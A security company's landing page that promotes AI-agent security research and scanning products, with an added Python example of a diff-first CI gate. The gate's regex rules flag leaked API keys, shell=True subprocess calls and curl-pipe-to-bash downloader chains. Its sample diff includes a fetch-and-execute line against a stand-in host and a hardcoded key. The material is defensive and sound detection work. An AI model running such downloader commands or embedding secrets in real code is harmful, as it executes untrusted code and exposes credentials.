AI SECURITY HUB

Learn. Break. Build. Defend.

Hands-on AI security across research, public exposure tracking, and release infrastructure for real Agent systems.

Prompt Injection | Agent Abuse | RAG Poisoning | Tool Calling | OpenClaw Exposure

Research: attack research and defensive breakdowns
Watchboards: public evidence surfaces for exposed Agent targets
Infra: policy, scan, and release gate control plane

SIGNALS

How AIPwn works

AIPwn is built as a loop rather than a thin company page: find the weakness, explain how it is exploited, and operationalize the fix as a release control.

RESEARCH

Attack chains, not generic commentary

We focus on concrete exploit paths: prompt injection, tool abuse, permission overreach, leaked secrets, and exposed endpoints.

Read the briefings →

WATCHBOARDS

Public proof that scanning is happening

OpenClaw watchboards make security results visible, sortable, and shareable instead of burying them in a single report artifact.

Open OpenClaw →

PRODUCT

Turn findings into release control

ClawPlane connects policy, scan, and gate decisions so the same evidence flows into CI, deploy, and public trust surfaces.

Open ClawPlane →

PRODUCTS

What we are building

Everything orbits one goal: make AI systems harder to break and easier to verify.

Newsletter

AI security briefings with real attack chains, defense breakdowns, and practical industry signals.

Live
Subscribe →

ClawPlane

Agent security and release infrastructure. One control plane for policy, scanning, and CI/deploy gates.

Alpha
Open Product Page →

ClawScan

Evidence-rich scanning for repos, skills, MCP servers, and exposed OpenClaw services.

Live Surface
Open Watchboard →

ClawGate

PR, CI, and deploy gate module that blocks risky merges based on policy thresholds and diff-first findings.

Alpha
Join Alpha →

COVERAGE

What we track across the Agent attack surface

These are the problems AIPwn works on across the Agent attack surface.

Current focus areas

Prompt Injection

Instruction override, hidden tool abuse, indirect prompt poisoning, and unsafe retrieval flows.

Tool And Runtime Abuse

Shell execution, downloader chains, unsafe subprocess usage, and overly broad permissions.

Secret Exposure

Leaked API keys, tokens in repos, unsafe logs, and public config artifacts.

Public Agent Exposure

OpenClaw services reachable without authentication, publicly served docs and OpenAPI specs, and other externally reachable risky interfaces.
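As an added example (not ClawGate's or AIPwn's code; every rule name, regex, severity and policy threshold below is hypothetical), here is what a diff-first gate of the kind the ClawGate and coverage sections describe looks like in Python. It parses a unified diff, scores only the lines a pull request adds for leaked API keys, shell=True subprocess calls and curl-pipe-shell downloader chains, then compares per-severity counts against policy thresholds to return a block or allow decision. The diff it runs on is constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed unified diff standing in for a pull request (not real project data).
SAMPLE_DIFF = """\
diff --git a/agent/tools.py b/agent/tools.py
--- a/agent/tools.py
+++ b/agent/tools.py
@@ -1,4 +1,8 @@
 import subprocess
-OPENAI_API_KEY = os.environ["OPENAI_API_KEY"]
+OPENAI_API_KEY = "sk-proj-abc123def456ghi789jkl012mno345pq"
+
+def run_tool(cmd):
+    return subprocess.run(cmd, shell=True, capture_output=True)
+
 def safe():
     pass
diff --git a/scripts/setup.sh b/scripts/setup.sh
--- a/scripts/setup.sh
+++ b/scripts/setup.sh
@@ -10,2 +10,3 @@
 set -e
+curl -fsSL https://example.invalid/install.sh | bash
 echo done
"""

HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: int   # hypothetical scale: 1 low, 2 medium, 3 high
    path: str
    line: int       # line number in the new version of the file
    text: str


# Hypothetical rule set: (rule id, severity, pattern applied to added lines only).
RULES = [
    ("secret.openai_key", 3, re.compile(r"sk-[A-Za-z0-9_-]{20,}")),
    ("secret.aws_access_key", 3, re.compile(r"AKIA[0-9A-Z]{16}")),
    ("runtime.shell_true", 2, re.compile(r"subprocess\.\w+\([^)]*shell\s*=\s*True")),
    ("runtime.downloader_chain", 2, re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")),
]

# Hypothetical policy thresholds: how many findings of each severity a merge may carry.
POLICY = {3: 0, 2: 1, 1: 5}


def scan_diff(diff_text: str) -> list[Finding]:
    """Score only added lines: pre-existing code in the repo is never re-scored here."""
    findings: list[Finding] = []
    path, new_line = "", 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):            # new-side file header (assumes git's b/ prefix)
            path = raw[4:].removeprefix("b/")
            continue
        if raw.startswith("diff --git") or raw.startswith("--- "):
            continue
        m = HUNK_RE.match(raw)
        if m:                                 # hunk header carries the new-side start line
            new_line = int(m.group(1))
            continue
        if raw.startswith("-"):               # removed line: not in the new tree, no number
            continue
        if raw.startswith("+"):
            added = raw[1:]
            for rule, sev, pat in RULES:
                if pat.search(added):
                    findings.append(Finding(rule, sev, path, new_line, added.strip()))
            new_line += 1
        elif raw.startswith(" ") or raw == "":  # context line (blank lines may be stripped)
            new_line += 1
    return findings


@dataclass(frozen=True)
class Decision:
    blocked: bool
    reasons: tuple[str, ...]


def evaluate(findings: list[Finding], policy: dict[int, int] = POLICY) -> Decision:
    """Block when any severity bucket exceeds the threshold the policy allows for it."""
    counts: dict[int, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    reasons = tuple(
        f"severity {sev}: {counts.get(sev, 0)} finding(s) exceeds limit {limit}"
        for sev, limit in sorted(policy.items(), reverse=True)
        if counts.get(sev, 0) > limit
    )
    return Decision(blocked=bool(reasons), reasons=reasons)


def gate(diff_text: str, policy: dict[int, int] = POLICY) -> tuple[list[Finding], Decision]:
    findings = scan_diff(diff_text)
    return findings, evaluate(findings, policy)


if __name__ == "__main__":
    found, decision = gate(SAMPLE_DIFF)
    for f in found:
        print(f"{f.path}:{f.line} [{f.rule} sev={f.severity}] {f.text}")
    print("BLOCK" if decision.blocked else "ALLOW", *decision.reasons, sep="\n  ")
```

Scoring only added lines is what makes the gate diff-first: a repository that already carries findings is not blocked on unrelated merges, but no new finding above threshold gets in. Regex rules only catch secrets with a known prefix, so a real gate pairs them with entropy checks and a verification step against the issuer; the thresholds are a policy decision, not a constant.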

Do not ship blind

Subscribe for attack research. Use ClawPlane when you need policy, scan, and gate control in the same release path.